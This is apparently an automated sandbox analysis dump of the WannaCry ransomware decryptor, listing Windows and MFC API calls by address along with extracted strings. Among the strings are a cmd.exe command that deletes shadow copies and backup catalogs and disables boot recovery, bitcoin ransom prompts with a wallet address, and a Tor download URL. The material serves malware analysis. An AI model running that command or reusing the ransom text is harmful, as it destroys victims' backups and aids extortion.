      • Part of subcall function 00406DC0: #6136.MFC42 ref: 00406EC4
      • Part of subcall function 00406DC0: #825.MFC42(?), ref: 00406ED7
    • #665.MFC42 ref: 00406D87
    APIs
      • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
      • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
    • time.MSVCRT ref: 00407DEA
    • #2514.MFC42 ref: 00407E18
    • time.MSVCRT ref: 00407E2A
    • #765.MFC42 ref: 00407E49
    • #641.MFC42 ref: 00407E5D
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
    • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
    • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
    • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
    APIs
    Strings
    • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
    • s.wnry, xrefs: 0040BE97
    APIs
    • fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
    • fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00402650: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000167,00000167), ref: 00402688
    • fclose.MSVCRT ref: 00403C62
    APIs
    • #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BAF0: strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040BAF0: strtok.MSVCRT ref: 0040BC22
      • Part of subcall function 0040BAF0: #825.MFC42(?,?), ref: 0040BCDD
      • Part of subcall function 0040BAF0: GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
      • Part of subcall function 0040BAF0: srand.MSVCRT ref: 0040BCF3
      • Part of subcall function 0040BAF0: rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040BAF0: #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
      • Part of subcall function 0040BAF0: Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040BAF0: #825.MFC42(?,?,?,?), ref: 0040BDED
      • Part of subcall function 0040BAF0: #825.MFC42(?), ref: 0040BE7A
    • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
    • GetUserNameA.ADVAPI32 ref: 0040BFF5
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
    • DeleteFileA.KERNEL32(?), ref: 0040B6D9
    • sprintf.MSVCRT ref: 0040B74E
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
      • Part of subcall function 00412A00: #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
      • Part of subcall function 00412A00: #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    APIs
      • Part of subcall function 00412A90: malloc.MSVCRT ref: 00412A95
      • Part of subcall function 0040D2B0: memmove.MSVCRT ref: 0040D2E1
    • time.MSVCRT ref: 0040D408
    • Sleep.KERNEL32(00000064), ref: 0040D46B
    • time.MSVCRT ref: 0040D487
    • free.MSVCRT(?), ref: 0040D4A9
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004108FB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
    • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
    APIs
    • _mbscmp.MSVCRT ref: 00405191
    • #860.MFC42(?), ref: 004051A1
    • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    APIs
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
    • #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
    • #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    APIs
    • _TrackMouseEvent.COMCTL32(00000010), ref: 00404463
    • #2379.MFC42 ref: 0040446F
    • #2379.MFC42 ref: 004044AA
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    • SetCursor.USER32(?), ref: 004044A2
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
    • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
    • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
    • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    APIs
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
    APIs
    • #2379.MFC42(00000001), ref: 00407667
    • #2379.MFC42 ref: 00407692
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F

    Executed Functions

    APIs
    • #4710.MFC42 ref: 004064DC
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
      • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
      • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
      • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
      • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
      • Part of subcall function 00401C70: RegQueryValueExA.ADVAPI32 ref: 00401D81
      • Part of subcall function 00401C70: SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
      • Part of subcall function 00401C70: RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
    • strrchr.MSVCRT ref: 00406554
    • strrchr.MSVCRT ref: 00406564
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    • time.MSVCRT ref: 004065D1
      • Part of subcall function 00402C40: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    • WSAStartup.WS2_32(00000202,?), ref: 004065FA
    • __p___argc.MSVCRT ref: 00406600
    • __p___argv.MSVCRT ref: 0040661A
    • ExitProcess.KERNEL32 ref: 0040665B
    • __p___argv.MSVCRT ref: 00406666
    • ExitProcess.KERNEL32 ref: 004066A7
    • __p___argv.MSVCRT ref: 004066B2
    • Sleep.KERNEL32(00002710), ref: 004066F3
      • Part of subcall function 00401BB0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
      • Part of subcall function 00401BB0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
      • Part of subcall function 00401BB0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
    • ExitProcess.KERNEL32 ref: 00406786
      • Part of subcall function 00401B50: ShellExecuteExA.SHELL32 ref: 00401B9D
    • sprintf.MSVCRT ref: 0040676A
      • Part of subcall function 00401A90: CreateProcessA.KERNEL32 ref: 00401AE3
      • Part of subcall function 00401A90: WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
      • Part of subcall function 00401A90: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
      • Part of subcall function 00401A90: GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B31
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B38
      • Part of subcall function 004080C0: FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
      • Part of subcall function 004080C0: sscanf.MSVCRT ref: 0040816A
      • Part of subcall function 004080C0: fopen.MSVCRT ref: 00408185
      • Part of subcall function 004080C0: fread.MSVCRT ref: 004081A0
      • Part of subcall function 004080C0: fclose.MSVCRT ref: 004081BE
      • Part of subcall function 004080C0: FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
      • Part of subcall function 004080C0: FindClose.KERNEL32(?), ref: 00408200
      • Part of subcall function 004080C0: sprintf.MSVCRT ref: 00408266
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
      • Part of subcall function 00407F80: fopen.MSVCRT ref: 00407FBD
      • Part of subcall function 00407F80: fread.MSVCRT ref: 00407FDD
      • Part of subcall function 00407F80: fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 00407E80: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
      • Part of subcall function 00407E80: wcslen.MSVCRT ref: 00407EF4
      • Part of subcall function 00407E80: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
      • Part of subcall function 00407E80: MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
      • Part of subcall function 00407E80: CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
      • Part of subcall function 00407E80: SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FBC
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00121284), ref: 00406FC6
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FCF
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FE2
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FF5
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00000000), ref: 00406FFC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407005
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(003834D1), ref: 0040700F
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407018
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00107C10), ref: 00407022
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040702B
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E8A200), ref: 00407035
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040703E
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00D77800), ref: 00407048
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407051
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407064
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040709C
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
      • Part of subcall function 00406C20: GetUserDefaultLangID.KERNEL32 ref: 00406C3B
      • Part of subcall function 00406C20: GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
      • Part of subcall function 00406C20: SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
    • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
    Strings
    • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
    • Wana Decrypt0r 2.0, xrefs: 00406796
    • %s %s, xrefs: 00406764
    • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
    • cmd.exe, xrefs: 0040671C
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
    • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
    • #2621.MFC42 ref: 00405A96
    • #6438.MFC42 ref: 00405A9B
      • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
    • #2514.MFC42 ref: 00405AC1
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
      • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
    • #800.MFC42 ref: 00405C33
    • #800.MFC42 ref: 00405C47
    • #800.MFC42 ref: 00405C5B
    • #800.MFC42 ref: 00405C6F
    • #781.MFC42 ref: 00405C83
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42 ref: 00405D37
    • #609.MFC42 ref: 00405D4B
    • #616.MFC42 ref: 00405D5C
    • #641.MFC42 ref: 00405D70
    APIs
      • Part of subcall function 00404C40: #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
      • Part of subcall function 00404C40: #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
      • Part of subcall function 00404C40: #860.MFC42(00421798), ref: 00404CAD
    • #2514.MFC42 ref: 00407AF1
    • #537.MFC42(***), ref: 00407B04
    • #941.MFC42(00421234,***), ref: 00407B1A
    • #939.MFC42(?,00421234,***), ref: 00407B28
    • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
    • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
    • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
    • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
    • #2385.MFC42(?,?,?), ref: 00407C0E
    APIs
    • #2302.MFC42(?,0000040F,?), ref: 004063B2
    • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
    • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
    • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
    • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
    • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
    • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
    • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
    • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
    • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
    • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
    • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
    • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
    • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
    • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
    APIs
    • FindWindowW.USER32(00000000,00000000), ref: 0040B628
    • ShowWindow.USER32(00000000,00000005), ref: 0040B638
    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
    • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
    • SetForegroundWindow.USER32(00000000), ref: 0040B663
    • SetFocus.USER32(00000000), ref: 0040B66A
    • SetActiveWindow.USER32(00000000), ref: 0040B671
    • BringWindowToTop.USER32(00000000), ref: 0040B678
    • ExitProcess.KERNEL32 ref: 0040B689
    APIs
    • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
    • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
    • #5277.MFC42 ref: 00404402
    APIs
    • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6

    Non-executed Functions

    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • swprintf.MSVCRT ref: 00402728
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
    • wcscmp.MSVCRT ref: 004027E1
    • wcscmp.MSVCRT ref: 004027FB
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
    • GetFileAttributesW.KERNEL32(?), ref: 00402830
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 00402AF0: _wcsnicmp.MSVCRT ref: 00402AFF
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402B18
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B39
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B53
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B6D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B87
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BA1
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BBB
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BD5
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BF3
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C0D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C27
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
    • wcslen.MSVCRT ref: 0040286E
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
    • wcscmp.MSVCRT ref: 004028C3
    • wcscmp.MSVCRT ref: 004028DD
    • wcscmp.MSVCRT ref: 004028F3
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
    • wcslen.MSVCRT ref: 00402914
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 00402DA0: #823.MFC42(00000018,0001D3EC,0001D42E,?,00000000,00402949), ref: 00402DAF
    • FindNextFileW.KERNEL32(?,?), ref: 0040296A
    • FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 00402560: wcscpy.MSVCRT ref: 0040257D
